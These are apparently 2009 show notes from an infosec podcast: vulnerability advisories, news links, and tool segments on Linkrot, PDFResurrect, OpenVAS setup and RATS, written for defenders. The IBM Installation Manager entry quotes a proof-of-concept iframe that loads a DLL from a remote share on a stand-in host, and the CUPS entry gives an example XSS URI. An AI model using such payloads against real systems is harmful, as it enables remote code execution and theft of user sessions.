Vulnerabilities of Interest:

1. VUPEN is reporting that a vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the “getElementsByTagName()” method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.
2. NTP ‘ntpq’ Stack Buffer Overflow Vulnerability – The ‘ntpq’ command is prone to a stack-based buffer-overflow vulnerability.  Successful exploits will crash the affected utility. Code execution may also be possible, but has not been confirmed.
3. Cisco VPN Client “cvpnd” Service Local Denial of Service – A vulnerability has been reported in Cisco VPN Client, which can be exploited by malicious, local users to cause a DoS (Denial of Serivce).   The vulnerability is caused due to an improper error handling within the cvpnd.exe binary, which can be exploited to terminate the cvpnd service with all active VPN sessions. The vulnerability is reported in versions prior to 5.0.06.0100. The solutions is to update to version 5.0.06.0100.
4. Linux Kernel ‘NFS filename’ Local Denial of Service Vulnerability – The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to trigger a kernel oops, resulting in a denial-of-service condition.
5. Linux Kernel ‘exit_notify()’ CAP_KILL Verification Local Privilege Escalation Vulnerability – The Linux kernel is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in a complete compromise of the affected computer.Versions prior to Linux kernel 2.6.29-git14 are vulnerable. An exploit is available in the Wild.
6. Linux Kernel CIFS Remote Buffer Overflow Vulnerability – The Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. The issue affects Linux Kernel 2.6.29; other versions may also be vulnerable.
7. Linux Kernel nfsd ‘CAP_MKNOD’ Unauthorized Access Vulnerability – The Linux Kernel is prone to an unauthorized-access vulnerability that can occur when users with certain capabilities connect to the ‘nfsd’ service. Attacker with authenticated access to the affected application can exploit this issue to perform privileged operations on a vulnerable computer; this may aid in further attacks. Can be exploited by using readily available tools.
8. ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability – ISC BIND is prone to a remote denial-of-service vulnerability because the software fails to properly handle specially crafted dynamic update requests. Successfully exploiting this issue allows remote attackers to crash affected DNS servers, denying further service to legitimate users. Other attacks are also possible. Versions prior to BIND 9.4.3-P3, 9.5.1-P3, and 9.6.1-P3 are vulnerable. This issue is being actively exploited in the wild.
9. Sun Solaris OpenSSL TLS Session Renegotiation Plaintext Injection Vulnerability -  Sun has acknowledged a vulnerability in Solaris, which can be exploited by malicious people to manipulate certain data. A final resolution is pending completion.

News Items of Interest:

News item 1: (http://www.v3.co.uk/v3/news/2253708/insurers-found-facebook)

News item 2: (http://www.itworldcanada.com/news/reputation-based-security-to-dominate/139392)

News item 3: (http://www.theregister.co.uk/2009/11/20/snow_leopard_atom_support/)

A custom version of OS 10.6.2 distributed here. More about how to install the patch is available from this forum at Insanely Mac.

News item 4: (http://blogs.zdnet.com/green/?p=8783)

News item 5: (http://news.cnet.com/8301-13860_3-10402783-56.html?part=rss&subj=news&tag=2547-1_3-0-20)

News item 6: (http://www.sciencedaily.com/releases/2009/11/091118160627.htm)

News item 6: (http://news.softpedia.com/news/Comcast-Domain-Hijackers-Indicted-127635.shtml)

Tech Segment:

Linkrot scans a site for inaccessible links (http error 404, 500, etc.) and saves a log with bad links that you can open in Excel.  It’s a Windows console application developed in C# (.NET 2.0 stack). Simple, single thread crawling for dead links, broken links, dangling links.

C:\Users\rhayes\Downloads>linkrot

Finds inaccessible links in a website (single thread version).
All links are written to Links.txt.
Bad links are written to Error.txt.

Use:             linkrot.exe <url>
Example:         linkrot.exe http://www.linkrot.be/
Example:         linkrot.exe http://www.linkrot.be/ >> logfile.txt

Error level -1:  Parameter fault, given url is not accessible.
Error level  0:  All went well, no bad links found.
Error level  1:  Bad links found, see error log for details.

Comments to info@patrick.nl, www.patrick.nl.

C:\Users\rhayes\Downloads>linkrot http://www.irongeek.com >>logfile.txt

logfile.txt:
Resolved  http://www.irongeek.com/
Resolved  http://www.dreamhost.com/r.cgi?155413
Resolved  http://www.irongeek.com/i.php
Resolved  http://www.irongeek.com/i.php?page=security/hackingillustrated
Resolved  http://www.irongeek.com/i.php?page=security/security
Resolved  http://www.irongeek.com/i.php?page=mobile-device-hacking
Resolved  http://www.irongeek.com/i.php?page=security/code
Resolved  http://www.irongeek.com/i.php?page=reviews/reviews
Resolved  http://feedproxy.google.com/IrongeeksSecuritySite
Resolved  http://www.irongeek.com/browserinfo.php
Resolved  http://www.irongeek.com/security-podcasts.php
Resolved  http://www.irongeek.com/i.php?page=hoosier
Resolved  http://www.irongeek.com/newscat.php
Resolved  http://www.irongeek.com/i.php?page=links
Resolved  http://www.irongeek.com/i.php?page=contact
Resolved  http://www.irongeek.com/i.php?page=forum/index
Resolved  http://www.irongeek.com/i.php?page=workout/workout
Resolved  http://www.irongeek.com/i.php?page=fitness/nutrition
Resolved  http://www.irongeek.com/i.php?page=fitness/supplements
Resolved  http://www.irongeek.com/i.php?page=humor/humor
Resolved  http://www.irongeek.com/i.php?page=advertise
Resolved  http://www.irongeek.com/i.php?page=hire-adrian-for-security-or-tech-w
Resolved  http://www.irongeek.com/i.php?page=campuses-that-use-irongeek-for-tea
Resolved  http://www.irongeek.com/fed-watch.php

Links.txt
Status    Found on page    Link    Milliseconds    Content type
Resolved    http://www.irongeek.com/    http://www.irongeek.com/    9219    text/html
Resolved    http://www.irongeek.com/    http://www.dreamhost.com/r.cgi?155413    2958    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php    1375    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/hackingillustrated    1415    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/security    1876    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=mobile-device-hacking    3471    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/code    755    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=reviews/reviews    765    text/html
Resolved    http://www.irongeek.com/    http://feedproxy.google.com/IrongeeksSecuritySite    12794    text/xml; charset=UTF-8
Resolved    http://www.irongeek.com/    http://www.irongeek.com/browserinfo.php    1620    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/security-podcasts.php    5396    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=hoosier    283    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/newscat.php    453    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=links    221    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=contact    261    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=forum/index    140    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=workout/workout    342    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=fitness/nutrition    145    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=fitness/supplements    309    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=humor/humor    215    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=advertise    183    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana    169    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education    210    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/fed-watch.php    3629    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=books    466    text/html
Resolved    http://www.irongeek.com/    http://www.printfection.com/irongeek/    5934    text/html; charset=UTF-8
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=about    1824    text/html

Error.txt:
Error message    Found on page    Bad link    Milliseconds
Timeout    http://www.irongeek.com/    http://www.packetsniffers.org/    21495
Timeout    http://www.irongeek.com/    http://hackhound.org/    21106
Timeout    http://www.irongeek.com/    http://hackhound.org/images/button2.gif    21007
NotFound    http://www.irongeek.com/i.php?page=security/hackingillustrated    http://leebaird.com/Me/Hacking.html    559
Timeout    http://www.irongeek.com/i.php?page=security/hackingillustrated    http://phreaknic.wilpig.org/    21208

Linkrot is available in command-line utility and source code from here: Linkrot

Vulnerabilities of Interest:

1. file CDF File Parsing Multiple Buffer Overflow Vulnerabilities – The ‘file’ command is prone to multiple buffer-overflow vulnerabilities because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Versions prior to ‘file’ 5.02 are vulnerable.
2. Sun Java Runtime Environment Multiple Unspecified Same Origin Policy Violation Vulnerabilities – Sun Java Runtime Environment is prone to multiple unspecified vulnerabilities that allow attackers to bypass the same-origin policy. This issue occurs because the application fails to properly enforce the same-origin policy for Java applets. An attacker may create a malicious applet that is loaded from a remote system to circumvent network access restrictions. The following are affected: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, SDK and JRE 1.4.2_17 and earlier SDK and JRE 1.3.x_22 and earlier
3. Sun Java Runtime Environment XML Data Processing Multiple Vulnerabilities – Sun Java Runtime Environment is prone to multiple remote vulnerabilities. An attacker can exploit these issues to obtain sensitive information or crash the affected application, denying service to legitimate users. These issues affect the following versions on Solaris, Linux, and Windows platforms: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier
4. Sun Java SE Java Management Extensions (JMX) Unspecified Unauthorized Access Vulnerability – JMX is prone to an unspecified unauthorized-access vulnerability.  The vulnerability allows a JMX client to perform unauthorized actions on a computer running JMX with local monitoring enabled. The issue affects the following versions for Windows, Solaris, and Linux: JDK and JRE 6 Update 6 and earlier as well as  JDK and JRE 5.0 Update 15 and earlier
5. Sun Java Runtime Environment Virtual Machine Privilege Escalation Vulnerability – Sun Java Runtime Environment Virtual Machine is prone to a privilege-escalation vulnerability when running untrusted applications or applets. Successful exploits may allow attackers to read, write, or execute arbitrary local files in the context of the user running an untrusted application in the affected virtual machine. This may result in a compromise of the underlying system. This issue affects the following versions: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier SDK and JRE 1.4.2_17 and earlier
6. Hitachi Multiple Products Remote Code Execution Vulnerabilities – Multiple products from Hitachi are prone to multiple code-execution vulnerabilities. A remote attacker could exploit these issues by enticing a victim to open a malicious file. Successfully exploiting these issues would allow the attacker to execute arbitrary code in the context of the currently logged-in user or cause denial-of-service conditions.
7. IBM Installation Manager ‘iim://’ URI Handling Remote Code Execution Vulnerability – IBM Installation Manager is prone to a remote code-execution vulnerability. Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. The following products that include Installation Manager are vulnerable: IBM Rational Robot and IBM Rational Team Concer. The following proof of concept is available:  &lt;iframe src=’iim://” -vm \\www.example.com\uncshare\sh.dll -url “‘&gt;&lt;/iframe&gt; Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
8. Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities – Omni-NFS is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied network data before copying it into an insufficiently sized memory buffer. The issues affect both server and client. Exploiting these issues allows attackers to execute arbitrary machine code in the context of users running the affected application. Failed attempts will likely crash the application, resulting in denial-of-service conditions. Omni-NFS 5.2 is vulnerable; other versions may also be affected. Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. There are also exploits are available in the wild.
9. Hitachi Device Manager IPv6 Security Bypass Vulnerability – Hitachi Device Manager and JP1/HiCommand are prone to a security-bypass vulnerability because of an unspecified error related to IPv6 functionality. Very few technical details are available as of now though we will continue to monitor this one. Hitachi Multiple Products GIF File Parsing Buffer Overflow Vulnerability – Multiple Hitachi products, including Cosminexus, Processing Kit for XML, and Hitachi Developer’s Kit for Java, are prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
10. Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability – The Apache ‘mod_proxy_ftp’ module is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.  A working commercial exploit is available through Intevydis otherwise no publicly available or known to be circulating in the wild.
11. WebKit Preflight Request Same-Origin Policy Bypass Vulnerability – WebKit is prone to a vulnerability that lets attackers bypass the same-origin policy.  Attackers can exploit this issue to access resources from another origin in the context of another domain. This can facilitate cross-site request-forgery attacks.
12. Sun Solaris Samba Information Disclosure and Denial of Service – Sun has acknowledged some vulnerabilities in Samba in Solaris, which can be exploited by malicious users to disclose sensitive information and cause a DoS (Denial of Service).

News Items of Interest:

News item 1: (http://www.theglobeandmail.com/news/technology/rim-security-chief-warns-of-future-smart-phone-attacks/article1368297/)

News item 2: (http://www.h-online.com/security/news/item/Fedora-12-allows-users-install-privilege-Update-863623.html)

News item 3: (http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1374839,00.html)

News item 4: (http://www.reuters.com/article/rbssTechMediaTelecomNews/idUSPEK26455220091119?rpc=401)

News item 5: (http://www.cio.com/article/508029/How_to_Hack_China_for_Just_1_800?source=rss_security)

News item 6: (http://www.informationweek.com/news/government/policy/showArticle.jhtml?articleID=221900107)

Tech Segment:

PDFResurrect is a tool aimed at analyzing PDF documents. The PDF format allows for previous document changes to be retained in a more recent version of the document, thereby creating a running history of changes for the document. This tool attempts to extract all previous versions while also producing a summary of changes between versions. This tool can also “scrub” or write data over the original instances of PDF objects that have been modified or deleted, in an effort to disguise information from previous versions that might not be intended for anyone else to read.

This project is released under the GNU GPLv3 license. So have at it!

Download PDFResurrect v0.9

Vulnerabilities of Interest:

1. Kolab Server ClamAV Archive Handling Security Bypass – Some security issues have been reported in Kolab Server, which can potentially be exploited by malware to bypass certain security restrictions. The security issues are caused due to errors in the handling of certain file types in combination with ClamAV. This can be exploited to bypass security restrictions specified for certain files. Solution is to upgrade the ClamAV package to version 0.95.3.
2. Kaspersky Anti-Virus 2010 kl1.sys Denial of Service Vulnerability -A vulnerability has been discovered in Kaspersky Anti-Virus 2010, which can be exploited by malicious, local users to cause a DoS (Denial of Service).  The vulnerability is caused due to an error in the kl1.sys driver when handling IOCTLs. This can be exploited to dereference invalid memory and cause a kernel crash via a specially crafted 0x0022C008 IOCTL. The vulnerability is confirmed in version 9.0.0.463. Other versions may also be affected.  Solution is to update to version 9.0.0.736.
3. Sun Java SE Multiple Security Vulnerabilities – Sun has released updates to address multiple vulnerabilities in Java SE. Very little technical information is currently available on these issues. These issues are addressed in the following releases: JDK and JRE 6 Update 15, JDK and JRE 5.0 Update 20, SDK and JRE 1.4.2_22 and SDK and JRE 1.3.1_26
4. Serv-U Web Client HTTP Request Remote Buffer Overflow Vulnerability – Serv-U Web Client is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Serv-U Web Client 9.0.0.5 is vulnerable; other versions may also be affected. Exploits are available in the wild.
5. RhinoSoft Serv-U FTP Server TEA Decoder Remote Stack Buffer Overflow Vulnerability – RhinoSoft Serv-U FTP Server is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Serv-U 9.0.0.5 is vulnerable; other versions may also be affected.
6. Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability – Sun Java Web Start and Java Plug-in are prone to a privilege-escalation vulnerability. This issue occurs when the affected applications parse a JAR file that is also a legitimate GIF image file. An attacker may exploit this issue to obtain sensitive information (such as HTTP session cookies) or to perform actions as legitimate users of a web application. This may aid in further attacks. NOTE: This issue was previously covered in BID 32620 (Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities), but has been given its own record to better document the issue. The following versions are affected: JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier, and SDK and JRE 1.3.1_23 and earlier
7. IBM SolidDB ‘solid.exe’ Denial of Service Vulnerability – IBM SolidDB is prone to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected.  Exploits are available in the wild.
8. Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability – Same deal just more vendors being added.  Again check with your vendor on this for updates.

News Items of Interest:

News item 1: (http://www.domainb.com/infotech/itnews/20091117_indo-pak_cyber_war.html)

News item 2: (http://www.networkworld.com/news/2009/111709-endpoint-security.html)

News item 3: (http://www.jdjournal.com/2009/11/17/hackers-targeting-large-law-firms-in-increasing-numbers/)

News item 4:(http://www.out-law.com//default.aspx?page=10530)

News item 5: (http://www.pcadvisor.co.uk/news/index.cfm?…id=3206496&)

News item 6: (http://www.infoworld.com/d/security-central/64-bit-windows-safer-claims-microsoft-787?source=rss_infoworld_news)

Tech Segment:

OpenVAS

OpenVAS is a new security assessment tool designed as an alternative to Nessus.  According to the OpenVAS website:

Once you get BackTrack up and running, you can login with root (password: toor) by default.  Launch Firefox to so that we can grab the latest version of the OpenVAS packages from the following website: apt.intevation.de/dists/lenny/openvas/binary-i386/?1246159210

libopenvas2_2.0.4-1intevation1_i386.deb
libopenvasnasl2_2.0.2-1intevation1_i386.deb
openvas-client_2.0.5-1intevation1_i386.deb
openvas-plugins_1.0.6-1intevation2_i386.deb
openvas-server_2.0.3-1intevation1_i386.deb

Grab the Pth, GD and GNOME wrapper libraries:
packages.debian.org/lenny/i386/libpth20/download
packages.debian.org/lenny/i386/libgpgme11/download
packages.debian.org/lenny/i386/libgdchart-gd2-noxpm/download

Finally, you will need to grab HTMLDOC: htmldoc.org/software.php?VERSION=1.9.x-r1586&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1586.tar.gz

wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/libopenvas2_2.0.4-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/libopenvasnasl2_2.0.2-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-client_2.0.5-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-plugins_1.0.6-1intevation2_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-server_2.0.3-1intevation1_i386.deb
wget http://http.us.debian.org/debian/pool/main/p/pth/libpth20_2.0.7-12_i386.deb
wget http://http.us.debian.org/debian/pool/main/g/gpgme1.0/libgpgme11_1.1.6-2_i386.deb
wget http://http.us.debian.org/debian/pool/main/libg/libgdchart-gd2/libgdchart-gd2-noxpm_0.11.5-6_i386.deb
wget ftp://nic.funet.fi/.m/mirrors2/ftp.easysw.com/pub/htmldoc/snapshots/htmldoc-1.9.x-r1586.tar.gz

Open the terminal and run the following commands in order:

dpkg -i libopenvas2_2.0.4-1intevation1_i386.deb
ldconfig
dpkg -i libpth20_2.0.7-12_i386.deb
dpkg -i libgpgme11_1.1.6-2_i386.deb
dpkg -i libopenvasnasl2_2.0.2-1intevation1_i386.deb
dpkg -i openvas-plugins_1.0.6-1intevation2_i386.deb
dpkg -i openvas-server_2.0.3-1intevation1_i386.deb
dpkg -i libgdchart-gd2-noxpm_0.11.5-6_i386.deb
dpkg -i openvas-client_2.0.5-1intevation1_i386.deb
tar -zxvf htmldoc-1.9.x-r1586.tar.gz
cd htmldoc-1.9.x-r1586
./configure
make
make install
openvas-adduser

oot@bt:~/htmldoc-1.9.x-r1586# openvas-adduser
/usr/sbin/openvas-adduser: 75: 0: not found
Using /var/tmp as a temporary file holder.

Add a new openvasd user
———————————


Login : admin
Authentication (pass/cert) [pass] : pass
Login password :
Login password (again) :

User rules
—————
openvasd has a rules system which allows you to restrict the hosts that admin has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)



Login             : admin
Password          : ***********

Rules             :



Is that ok? (y/n) [y] y
user added.

openvas-mkcert

root@bt:~/htmldoc-1.9.x-r1586# openvas-mkcert
/usr/sbin/openvas-mkcert: 85: 0: not found
——————————————————————————-
Creation of the OpenVAS SSL Certificate
——————————————————————————-

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.


CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]: US
Your state or province name [none]:
Your location (e.g. town) [Paris]: Atlanta
Your organization [OpenVAS Users United]:






——————————————————————————-
Creation of the OpenVAS SSL Certificate
——————————————————————————-

Congratulations. Your server certificate was properly created.

/etc/openvas/openvasd.conf updated
The following files were created:

. Certification authority:
Certificate = /var/lib/openvas/CA/cacert.pem
Private key = /var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
Certificate = /var/lib/openvas/CA/servercert.pem
Private key = /var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

openvas-nvt-sync

Start the OpenVAS server by typing the command “openvasd” in the terminal.  Open the OpenVAS Client by clicking on the Start button, going to Internet, and then clicking on OpenVAS-Client. Choose File > Connect and Enter the username and password which you created earlier. Wait for the client to connect to the server and then click File and then Scan Assistant.

Enter “localhost” to target your own computer for a scan.  Click the Execute button and once the scan is completed you will see “Report” followed by the date in the left pane of the OpenVAS client. Click on the report, and you can explore the report results in the middle and right panes of the client. You can also click on Report on the top command line of the OpenVAS client and click Print to make a pdf copy of the report.

InfoSec Daily Podcast Episode 11 [ 15.64 MB ] Play Now | Play in Popup | Download (11)

Vulnerabilities of Interest:

1. Gimp PSD Image Parsing Integer Overflow Vulnerability – Secunia Research has discovered a vulnerability in Gimp, which potentially can be exploited by malicious people compromise a user's system. The vulnerability is caused due to an integer overflow within the "read_channel_data()" function in plug-ins/file-psd/psd-load.c. This can be exploited to cause a heap-based buffer overflow by e.g. tricking a user into opening a specially crafted PSD file. The vulnerability is confirmed in version 2.6.7. Other versions may also be affected.
2. Linux Kernel KVM MCE "KVM_X86_SETUP_MCE" Buffer Overflow – A vulnerability has been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and potentially gain escalated privileges. The vulnerability is caused due to an error within the "kvm_vcpu_ioctl_x86_setup_mce()" function in arch/x86/kvm/x86.c. This can be exploited to corrupt kernel memory by e.g. sending a specially crafted "KVM_X86_SETUP_MCE" IOCTL. Fixed in version 2.6.32.-rc7.
3. avast! Home/Professional aswRdr.sys Memory Corruption Vulnerability -  A vulnerability has been discovered in avast! Home/Professional, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or potentially gain escalated privileges. The vulnerability is caused due to an error in aswRdr.sys when processing IOCTLs. This can be exploited to corrupt kernel memory via a specially crafted 0×80002024 IOCTL.
4. Home FTP Server "SITE INDEX" Denial of Service – A vulnerability has been discovered in Home FTP Server, which can be exploited by malicious users to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the handling of multiple "SITE INDEX" commands and can be exploited to stop the server. The vulnerability is confirmed in version 1.10.1.139. Other versions may also be affected. The currently offered solution is to restrict access to trusted users only.
5. HP OpenView Network Node Manager 'ovdbrun.exe' Denial of Service Vulnerability – HP OpenView Network Node Manager (NNM) is prone to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. The issue affects NNM 7.51 and 7.53.  Exploit is available in the wild.
6. HP Discovery & Dependency Mapping Inventory Arbitrary Code Execution – A vulnerability has been reported in HP Discovery & Dependency Mapping Inventory (DDMI), which can be exploited by malicious users to compromise a vulnerable system. The vulnerability is caused due to an unspecified error and can be exploited to execute arbitrary code.  The vulnerability is reported in HP Discovery & Dependency Mapping Inventory (DDMI) versions 2.5x, 7.5x, and 7.60, running on Windows.  Solution is to apply patches.
7. Warcraft III JASS Interpreter Arbitrary Code Execution – Some vulnerabilities have been reported in Warcraft III: The Frozen Throne, which can be exploited by malicious people to potentially compromise a user's system. The vulnerabilities are caused due to errors within the JASS script handling, which can be exploited to e.g. execute arbitrary code by tricking a user into loading a specially crafted map. Partially fixed in version 1.24b.

News Items of Interest:

News item 1: (http://community.zdnet.co.uk/blog/0,1000000567,10014468o-2000331761b,00.htm?s_cid=292)

News item 2: (http://isc.sans.org/diary.html?storyid=7603&rss) OpenVPN recommend upgrading to version 2.1_rc21 which is available here. Additional information regarding OpenVPN session renegotiation is available here.

News item 3: (http://www.wtop.com/?nid=108&sid=1814785)

News item 4: (http://www.metasploit.com/framework/download) After 12 months of development, version 3.3 of the Metasploit Framework has been released. Version 3.3 includes 120 new exploit modules, over 100 new auxiliary modules, and 180 bug fixes.

News item 5: (http://www.businesswire.com/portal/site/topix/?dmViewId=news_view&newsId=20091117005045&newsLang=en) For more information and insight from DeepNines Security Lab: http://www.deepnines.com/security-lab/deepnines-security-labs.

News item 6: (http://www.infosecurity-magazine.com/view/5280/astaro-joins-free-it-security-software-industry-to-boost-profile/) The software is available in two flavours: software appliance and virtual appliance.

News item 7: http://blogs.zdnet.com/security/?p=4956&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29

Tech Segment:
Rough Auditing Tool for Security. RATS (Rough Auditing Tool for Security), is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions. RATS scanning tool provides a security analyst with a list of potential trouble spots on which to focus, along with describing the problem, and potentially suggest remedies. It also provides a relative assessment of the potential severity of each problem, to better help an auditor prioritize. This tool also performs some basic analysis to try to rule out conditions that are obviously not problems.  RATS is free software, under the terms of the GNU Public License. RATS requires expat to be installed in order to build and run. Expat is often installed in /usr/local/lib and /usr/local/include. On some systems, you will need to specify —with-expat-lib and —with-expat-include options to configure so that it can find your installation of the library and header. More Info: http://expat.sourceforge.net/

rats [-d ] [-h] [-r] [-w ] [-x] [file1 file2 ... filen]

Options explained:

• -d Specifies a vulnerability database to be loaded. You may have multiple -d options and each database specified will be loaded. 

• -h Displays a brief usage summary 

• -i Causes a list of function calls that were used which accept external input to be produced at the end of the vulnerability report. 

• -l Force the specified language to be used regardless of filename extension. Currently valid language names are "c", "perl", "php" and "python". 

• -r Causes references to vulnerable function calls that are not being used as calls themselves to be reported. 

• -w Sets the warning level. Valid levels are 1, 2 or 3. Warning level 1 includes only default and high severity Level 2 includes medium severity. Level 2 is the default warning level 3 includes low severity vulnerabilities. 

• -x Causes the default vulnerability databases (which are in the installation data directory, /usr/local/lib by default) to not be loaded.

When started, RATS will scan each file specified on the command line and produce a report when scanning is complete. What vulnerabilities are reported in the final report depend on the data contained in the vulnerability database or databases that are used and the warning level in use.

For each vulnerability, the list of files and line numbers where it occurred is given, followed by a brief description of the vulnerability and suggested action.

InfoSec Daily Podcast Episode 10 [ 45:04 | 0.01 MB ] Play Now | Play in Popup | Download (10)

Announcements:

A quick reminder about the DC404 meeting this Saturday 2PM @ the Vortex Midtown.

Vulnerabilities of Interest:

1. Wikipedia Toolbar Remote Code Execution Vulnerability – The Wikipedia Toolbar add-on for Firefox is prone to a remote code-execution vulnerability; fixes are available. Attackers can exploit this issue to execute arbitrary JavaScript code with chrome privileges, which may result in a compromise of the affected computer. The issue affects Wikipedia Toolbar 0.5.9; other versions may also be affected.  The vendor fixed the issue in the experimental version 0.5.9.2.
2. Linux Kernel ‘nfs4_proc_lock()’ Local Denial of Service Vulnerability – The Linux kernel is prone to a local denial-of-service vulnerability.  Attackers can exploit this issue to cause the kernel to panic, denying service to legitimate users. Versions prior to Linux kernel 2.6.31-rc4 are vulnerable.
3. Linux Kernel ‘pipe.c’ Local Privilege Escalation Vulnerability – Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.   Exploits are available: 36901.sh 36901.py 36901-1.c 36901-2.c. Updates are available from the vendors.
4. CUPS ‘kerberos’ Parameter Cross Site Scripting Vulnerability – CUPS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Note: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.  This issue affects CUPS versions prior to 1.4.2.  Attackers can exploit this issue by enticing an unsuspecting victim into following a malicious URI. The following example URI is available: http://www.example.com/admin/?kerberos=onmouseover=alert
5. Samba Oplock Break Notification Remote Denial of Service Vulnerability – Samba is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the application to consume excessive CPU resources, denying service to legitimate users. Versions prior to Samba 3.4.2, 3.3.8, 3.2.15, and 3.0.37 are vulnerable.  To exploit this issue, attackers can use readily available network utilities.
